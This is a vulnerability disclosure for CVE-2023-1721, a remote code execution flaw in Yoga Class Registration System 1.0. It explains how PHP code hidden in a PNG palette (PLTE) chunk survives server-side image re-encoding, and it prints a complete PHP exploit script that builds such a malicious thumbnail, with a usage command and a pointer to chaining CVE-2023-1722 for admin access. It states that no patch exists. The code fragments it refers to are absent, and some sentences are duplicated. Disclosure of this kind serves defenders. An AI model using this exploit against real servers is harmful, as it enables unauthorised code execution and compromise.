Yoga Class Registration System 1.0 - RCE

Description

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.

Vulnerability

The application allows administrators to upload classes to the platform. Among all the possible fields that we have at the moment of creating the class, there is a very interesting one called "thumbnail". In this field, we can upload an image that will be shown as the cover of the class.

The vulnerability lies in the way the server processes the uploaded image in the class. uploaded in the class. The following is a fragment of the code that is in charge of processing the image:

In the above fragment we see that the image name is used to construct the final path where the image will be stored. the final path where the image will be stored.

This means that we can define the extension that the file will have, as well as the path where it will be stored on the server. This looks very well, however we have certain restrictions on the content of the file. It happens that the server performs the following operations on the image uploaded by the user. uploaded by the user.

The imagecreatefromjpeg and imagecreatefrompng functions create new images (compressed to level 9 with the zlib library) from the image uploaded by the user. This process removes the image comments and most of the image fragments except for one called PLTE.

On the other hand the imagescale function resizes the image if necessary. This function removes the PLTE fragment. However, if we send an image that does not need to be resized, the image will retain the PLTE fragment. To achieve this we only need to upload an image whose width is less than or equal to 640 and whose height is less than or equal to 480.

Exploitation

To exploit the above vulnerability we need to be administrators. For that we just need to exploit the CVE-2023-1722. Once we manage to be admin, we must build a malicious image that survives the transformations and resizing performed by the server. To achieve this I have written the following exploit:

Exploit.php

<?php

if(count($argv) != 3) exit("Usage $argv[0] <PHP payload> <Output file>");

$_payload = $argv[1];
$output = $argv[2];

while (strlen($_payload) % 3 != 0) { $_payload.=" "; }

$_pay_len=strlen($_payload);
if ($_pay_len > 256*3){
    echo "FATAL: The payload is too long. Exiting...";
    exit();
}
if($_pay_len %3 != 0){
    echo "FATAL: The payload isn't divisible by 3. Exiting...";
    exit();
}

$width=$_pay_len/3;
$height=20;
$im = imagecreate($width, $height);

$_hex=unpack('H*',$_payload);
$_chunks=str_split($_hex[1], 6);

for($i=0; $i < count($_chunks); $i++){
    $_color_chunks=str_split($_chunks[$i], 2);
    $color=imagecolorallocate($im, hexdec($_color_chunks[0]), hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
    imagesetpixel($im,$i,1,$color);
}

imagepng($im,$output);

Now we just have to run the exploit:

php exploit.php '<?php phpinfo(); ?>'

Our security policy

We have reserved the ID CVE-2023-1721 to refer to this issue from now on. Disclosure policy

System Information

• Version: Yoga Class Registration System 1.0

• Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

References

• Vendor page https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html